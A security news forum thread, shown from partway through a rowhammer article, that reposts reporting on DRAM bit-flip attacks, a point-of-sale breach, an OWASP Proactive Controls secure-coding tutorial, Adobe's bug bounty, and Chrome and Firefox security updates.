Ortega said that the new technique is effective thanks to the way that DRAM devices are designed now. “Modern memory is flawed, vendors cut corners a lot to save power and make cheap tiny chips, so if you access too quickly a section of it, or if you turn on and off a memory cell too quickly, the adjacent memory cells will also be affected,’ he said. “The trick is to find a memory cell that stores something important and that you cannot access for security reasons, for example a memory cell storing a password, or file permissions, and then flip a cell next to it. Eventually the memory cell will flip, even if you don’t have access to it.” Mitigating rowhammer attacks is possible, Seaborn said. For example, manufacturers can make sure that when a system refreshes DRAM memory that it doesn’t activate a given row too often without also refreshing nearby rows. The rowhammer issue is not unknown to DRAM manufacturers, as some of them may already have implemented some mitigations. “Looking backward, had there been more public disclosures about the rowhammer problem, it might have been identified as an exploitable security issue sooner. It appears that vendors have known about rowhammer for a while, as shown by the presence of rowhammer mitigations in LPDDR4. It may be that vendors only considered rowhammer to be a reliability problem,” Seaborn said. Security researcher Dan Kaminsky, chief scientist of White Ops, said that the attack is effective in a surprising number of cases. “This sort of bug fills memory — the grand collection of buckets in your computer — with lots and lots of areas where checks for God like power depend on the bucket being empty. Then it shakes specially chosen buckets — ‘aggressor buckets’ — to try to leak a 1 into all those 0’s. And on a surprising amount of hardware, it works,” Kaminsky said via email. However, one good defense against the attack is the use of ECC memory, which has extra bits to help correct errors. ECC is more expensive, though, and mainly is used in servers rather than laptops and desktops, said researcher Robert Graham of Errata Security. “The biggest threat at the moment appears to be to desktops/laptops, because they have neither ECC memory nor virtual machines. In particular, there seems to be a danger with Google’s native client (NaCl) code execution. This a clever sandbox that allows the running of native code within the Chrome browser, so that web pages can run software as fast as native software on the system. This memory corruption defeats one level of protection in NaCl. Nobody has yet demonstrated how to use this technique in practice to fully defeat NaCl, but it’s likely somebody will discover a way eventually,” Graham said. The new techniques, Seaborn said, are a good example of why manufacturers and researchers should be paying close attention to hardware vulnerabilities. “History has shown that issues that are thought to be “only” reliability issues often have significant security implications, and the rowhammer problem is a good example of this. Many layers of software security rest on the assumption the contents of memory locations don’t change unless the locations are written to,” he said. “Though the industry is less accustomed to hardware bugs than to software bugs, we would like to encourage hardware vendors to take the same approach: thoroughly analyse the security impact of ‘reliability’ issues, provide explanations of impact, offer mitigation strategies and — when possible — supply firmware or BIOS updates. Such discussion will lead to more secure hardware, which will benefit all users.” Source
  22. Michigan-based provider of point-of-sale devices, NEXTEP SYSTEMS, is investigating a possible security compromise of customer systems, according to a statement emailed to SCMagazine.com on Monday by Tommy Woycik, president of NEXTEP SYSTEMS. “NEXTEP was recently notified by law enforcement that the security of the systems at some of our customer locations may have been compromised,” according to the statement, which goes on to add, “We do know that this is NOT affecting all NEXTEP customers, and we have been working with our customers to ensure that any issues are addressed.” An investigation is ongoing with law enforcement and data security experts. On Monday, technology journalist Brian Krebs reported that financial industry sources identified a pattern of fraud on payment cards used recently at Zoup!, a restaurant chain and NEXTEP SYSTEMS customer. He wrote that Zoup! referred him to NEXTEP SYSTEMS. Source
  23. In the first part of this series, we covered the Top 5 OWASP ProActive Controls and learned how they can prove to be of great use in securing applications. In this part, we will look at the last 5 OWASP ProActive Controls and learn more about them. Protect Data and Privacy It helps to protect our data inside a database. Sensitive data like passwords, credit card details and bank account details etc. should be stored in encrypted or hashed format inside a database or chosen data storage. One should not use encryption and hashing interchangeably, as encryption and hashing are entirely different from each other. Encryption is used to convert readable text or plain text into unreadable text or cipher text. Encryption is a two way data conversion technique, meaning data which is encrypted can also be decrypted (if you have the decryption key). Encryption can be done in two main ways: Symmetric method Asymmetric method Symmetric encryption or Secret Key Cryptography (SKC) uses a secret key for encryption and decryption. It means the receiver uses same key that was used for encryption to decrypt. Asymmetric method or Public Key Cryptography (PKC) uses two sets of keys to perform encryption and decryption. One is a public key and another is a private key. Public Key is used for data encryption and Private Key is used for data decryption. Depending upon your application requirement, developers can choose between the two encryption methods. Hashing is different from encryption; unlike encryption, it is a one way process. It means data that’s converted into hashed format can never be converted into plain text. An application cannot choose hashing or encryption just like that. A ecure storage technique is chosen depending upon the data that has to be stored securely. At some time in the future, if the sensitive data is to be shown to the user in plaintext, then encryption is the best option (plaintext <->ciphertext). If the sensitive data is to be stored for some validation or authentication or verification, then hashing should be stored (Plaintext -> Hash). For example: Sensitive information between the client and server should also be in encrypted form. Hyper Text Transfer Protocol Secure (HTTPS) should be used instead of Hyper Text Transfer Protocol (HTTP) whenever any sensitive information is to be transmitted. When HTTPS is used, client server communication is encrypted using supported technology like SSLv2, SSLv3, TLS1.0, and TLS1.2. It is especially used to protect highly confidential data like online banking. The port number for HTTP is 80 and for HTTPS is 443. Implement Logging and intrusion Detection In an application, most requests are received using GET, POST, PUT, and DELETE methods. A request sent can be either a malicious request or a clean request. Malicious requests are those requests which contain attack vectors like SQL Injection, XSS, Unauthorized Data Access, etc. When there is public user activity or Intranet employee access, then the application should always keep track of all the activities taking place. Logging is very important in every application and one of the areas which is most neglected during development and deployment. Logging means storing log data about every request that is sent and received, such time, IP address, requested page, GET data, and POST data of a request. If a user is authenticated, then who is the user, when he logged in, when he logged out, etc. Since all user activity is being logged, it should also be noted that user sensitive data like password and financial details should NEVER be logged. Intrusion Detection means a malicious request with an attack vector has been detected and received by the application or not. If such a request has been received, then suitable actions like logging and request drop should be performed. For example, if a SQL Injection vulnerability exists on a login page, the application should have a feature to detect when SQL Injection is performed and should log time and from which IP address the attack originated, and then perform a suitable action on it. ModSecurity and OWASP ModSecurity Core Rule Set Project can prove to be of great use when you want to detect and/or prevent any malicious activity. Logging and intrusion detection is necessary to keep a record of every activity that takes place on an application. Intrusion detection is implemented along with logging to keep a check on when an attack or malicious data is received, so that it can be handled properly. Leverage Security Features of Frameworks and Security Libraries When developers start developing any application, either they don’t implement secure coding practices or use third party libraries for implementing security features. But most programming languages or development framework have built-in security functions and libraries which can be leveraged to implement security features in applications. Developers should use those built-in features instead of third party libraries. Recall OWASP Top 10 Vulnerabilities “A-9 Using Components with Known Vulnerabilities”. If third party components or libraries are used and any vulnerability is discovered in those components, then our application will automatically become vulnerable. It is recommended that developers should use security features provided by the programming language like escapeHtml() of httputils provided by Apache Commons Lang in Java and htmlentities() in PHP, which can be used to mitigate Cross-Site Scripting (XSS) vulnerability. But it is a known fact that industry tested security features are not readily available in programming languages. In such a case where useful and required security features or libraries are not available in the programming language you are using, then industry trusted and tested security libraries should be used. One of the well-known OWASP projects for this purpose is the OWASP ESAPI Project, which helps developers to implement security controls in their applications. For example: In Java we have security functions like escapeHtml() which can be used to mitigate XSS. String name = StringEscapeUtils.escapeHtml(request.getParameter(“name”)); PreparedStatement is used to mitigate SQL Injection. PreparedStatement ps=(PreparedStatement) con.prepareStatement(“select * from users where username=? and password=? limit 0,1?); Using built-in security features ensures that you don’t have to use unnecessary libraries you are not confident in or have security tested. Include Security-Specific Requirements When a software or web application development is to be started, then software requirements are laid out, which takes place in the early stage of an SDLC. As software requirements are mentioned initially in any project, security requirements should also be mentioned. Security requirements, if being made part of an SDLC, can help in implementing security inside the application and also identifying the key areas which can be exploited. According to OWASP Proactive Controls, three security requirements are important: Security features and functions; Business logic abuse cases; And data classification and privacy requirements. Security features and function\ All security details, such as application features, modules, database details, modules functioning and security implementation in modules should be mentioned in an application. It should be defined that all secure coding practices in any application should be implemented at the time of development. Business logic abuse cases When any application is designed, there is a way to access data and to perform operations. For example, when a user is performing an online banking transaction, some details are required within a well-defined process: Login to bank account. Choose your account to transfer from. Choose amount and destination account to transfer to. Enter profile password. Enter OTP password received on registered phone number. Confirm transaction. Wait for success message. All these steps define a data flow diagram or business logic. Now these details can have some weaknesses, which can make them vulnerable. When the business logic has been listed, key areas of weakness can be identified, and areas where security can be beefed up can be identified too. For example: User should not be able to choose someone else’s bank account as source account of transfer. User should not be able to bypass profile password requirement. OTP should be valid only once and for that account only. Data classification and privacy requirement Data classification and requirement should be decided at the time of development. When any application interacts with the user, then user data is received and stored. The answers to these questions should be decided in advance: Which data is to be accepted from the user? Is that data sensitive or not? Is that data to be stored? If data is sensitive, then should the application decide if it will be stored in encrypted or hashed format? If bank details are stored, then those details should be verified and validated by the application. Data authorization should also be decided at an initial stage, like who can access, delete and modify data. Since the application will be dealing with users and operations on user data. It is critical to maintain logs for all activities. Logging of activity was discussed above in the “Implement Logging and Intrusion Detection” section. Security Design and Architecture In the last one to nine OWASP ProActive Controls, we saw how to implement security in our code, which areas to secure, how to secure and what components can be used to help you implement better security in your application. In the last ProActive Control, we discuss the other areas of application security which can prove to be of great use and should not be neglected. OWASP has defined three key areas to take care of when developing any application: Know Your Tools Tiering, Trust and Dependencies Manage the Attack Surface Know Your Tools Every application is built using some server side language, client side language, database or no database, etc. Each component used could be the source of opening a security vulnerability in your application and server. For example, using an outdated version of Struts Framework can lead to a user exploiting remote code execution on it, or an older version of PHP leading to the same consequence. Similar is the case for databases and every other component which is used to build an application. So before starting any application development, it should be made clear what components can or may lead to a vulnerable application in the present or near future. Tiering, Trust and Dependencies Each layer of the whole application is called a tier. With each tier there is an associated level of risk and vulnerabilities that can crop in. For every tier — be it client side, server side, database, or anything — the risk associated with it should be calculated, and necessary mitigations should be implemented. When an application is interacting with user input and user data, trust is the only factor which decides which operation should be performed, when to perform, and on what to perform. An authentication page not implemented properly will have a poor trust level and will allow malicious users to access others’ data. In the worst case, it will result in a user transferring funds or accessing confidential company data without proper authorization. Application development involves using several components all together and making sure that each component will work with others. This is the case of dependency, where X component depends upon Y component for its proper functioning. It is very common to use older components to maintain reliability and proper functioning. But each dependency should be thoroughly checked, or else it can create an unwanted weakness inside the application. Manage Attack Surface The attack surface is the whole combined application including software, hardware, logic, client controls, server controls. Everything from physical, digital, to logical makes the attack surface. Any part of a setup if and when found to be vulnerable can act as an open entry gate for a malicious user to perform an action. Developers are usually not concerned about the web server software version the application will be deployed on. But older web server software like Apache or Struts can lead to an attacker successfully exploiting it and managing his/her way into the application and user data. Conclusion From OWASP ProActive Controls we learned how an application can be secured and how to identify the key areas of every application that can all together help in strengthening our application and stored data. OWASP ProActive Controls are a good place to start training developers to implement secure coding practices and beef up the security of key areas of an application like authentication, authorization, user data access and storage. But ProActive Controls should not be looked upon as the only set of controls for application security. It is a good place to start developing skills and knowledge leading to continuous learning and habitual secure coding practices. Reference https://www.owasp.org/index.php/OWASP_Proactive_Controls Source
  24. Adobe has launched a bug bounty program that hands out high-fives, not cash. The web application vulnerability disclosure program announced today and launched last month operates through HackerOne used by the likes of Twitter, Yahoo!, and CloudFlare, some of which provide cash or other rewards to those who disclose security messes. Adobe's program seeks out common flaws in its online services, including cross-site scripting; privileged cross-site request forgery; server-side code execution; authentication or authorisation flaws; injection vulnerabilities; directory traversal; information disclosure, and significant security misconfiguration. "In recognition of the important role that independent security researchers play in keeping Adobe customers safe, today Adobe launches a web application vulnerability disclosure program on the HackerOne platform," wrote Adobe security program manager Pieters Ockers. "Bug hunters who identify a web application vulnerability in an Adobe online service or web property can now privately disclose the issue to Adobe while boosting their HackerOne reputation score." Hackers will need to be the first in for reporting a flaw and offer Adobe "reasonable" time to fix the flaws prior to public disclosure, Ockers says. Smaller vulnerabilities such as the following are excluded: Logout and other instances of low-severity cross-site request forgery Perceived issues with password reset links Missing http security headers Missing cookie flags on non-sensitive cookies Clickjacking on static pages The announcement comes as AirBnB this week launched its bug bounty on the popular HackerOne platform. Bug bounties work best when they offer cash, according to BugCrowd engineer Drew Sing. In vulnerability program guidelines published July he says money is the best incentive to encourage researchers to conduct more regular and intense testing of products and services. "A high priority security issue handled improperly could damage the reputation of the organisation ... the development, IT and communications team are all critical components to a successful program," Sing says. The managed bug service recommends bounties should be published in an obvious location on websites, preferably located with the /security subdomain, and sport a dedicated security contact who is well-briefed in handling disclosures. So why has Adobe decided street cred, not cash, is the way to go? Wags might wonder if the company's infamously-porous products have so many bugs that a cash bounty could dent the bottom line. Source
  25. Google and Firefox have upgraded their flagship browsers, crushing bugs and cracking down on bad certificates along the way. The Choc Factory's Chrome 41 swats 51 bugs of which at least 13 are classified as high severity and six considered medium risks. Google engineer Penny MacNeil thanked security researchers for the effort to identify the bugs. "We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel," MacNeil says. Here's this month's ameliorated messes: [$7500][456516] High CVE-2015-1212: Out-of-bounds write in media. Credit to anonymous. [$5000][448423] High CVE-2015-1213: Out-of-bounds write in skia filters. Credit to cloudfuzzer. [$5000][445810] High CVE-2015-1214: Out-of-bounds write in skia filters. Credit to cloudfuzzer. [$5000][445809] High CVE-2015-1215: Out-of-bounds write in skia filters. Credit to cloudfuzzer. [$4000][454954] High CVE-2015-1216: Use-after-free in v8 bindings. Credit to anonymous. [$3000][456192] High CVE-2015-1217: Type confusion in v8 bindings. Credit to anonymous. [$3000][456059] High CVE-2015-1218: Use-after-free in dom. Credit to cloudfuzzer. [$3000][446164] High CVE-2015-1219: Integer overflow in webgl. Credit to Chen Zhang (demi6od) of NSFOCUS Security Team. [$3000][437651] High CVE-2015-1220: Use-after-free in gif decoder. Credit to Aki Helin of OUSPG. [$2500][455368] High CVE-2015-1221: Use-after-free in web databases. Credit to Collin Payne. [$2500][448082] High CVE-2015-1222: Use-after-free in service workers. Credit to Collin Payne. [$2000][454231] High CVE-2015-1223: Use-after-free in dom. Credit to Maksymillian Motyl. [449610] High CVE-2015-1230: Type confusion in v8. Credit to Skylined working with HP’s Zero Day Initiative. [$2000][449958] Medium CVE-2015-1224: Out-of-bounds read in vpxdecoder. Credit to Aki Helin of OUSPG. [$1000][446033] Medium CVE-2015-1225: Out-of-bounds read in pdfium. Credit to cloudfuzzer. [$1000][456841] Medium CVE-2015-1226: Validation issue in debugger. Credit to Rob Wu. [$1000][450389] Medium CVE-2015-1227: Uninitialized value in blink. Credit to Christoph Diehl. [$1000][444707] Medium CVE-2015-1228: Uninitialized value in rendering. Credit to miaubiz. [$500][431504] Medium CVE-2015-1229: Cookie injection via proxies. Credit to iliwoy. Mozilla's updates Firefox version 37 include a revocation feature to bolster the killing of bad intermediate certificates. The OneCRL replaces the Online Certificate Status Protocol which is less effective because it relies on third parties to keep updated registries of their valid and revoked certificates. Certificates were often accepted as soft-fails when the status could not be determined due to some technical or connectivity failure. Mozilla's new list operates in the browser and is populated by issuers who push certificate status instead of the browser having to do the fetching. This block-list, already used for blacklisting bad plugins and drivers, will now speed up checking times because it avoids the need for Mozilla to push out updates that require browser restarts, Mozilla security boffin Mark Goodwin says. "OneCRL helps speed up revocation checking by maintaining a centralised list of revoked certificates and pushing it out to browsers. Currently, if a serious incident occurs that requires certificates to be revoked, we release an update to Firefox to address the problem. "This is slow because it takes some time for users to get the security update and restart their browsers. There’s also cost involved in producing an update and in users downloading it." Goodwin points to a blog by Google guy Adam Langley who said last year that the old revocation checking did little to improve security. OneCRL for now covers intermediate certificates to reduce the size of Mozilla's blocklist and will be later sped up by automating the collection of revoked certificates. Source
×
×
  • Create New...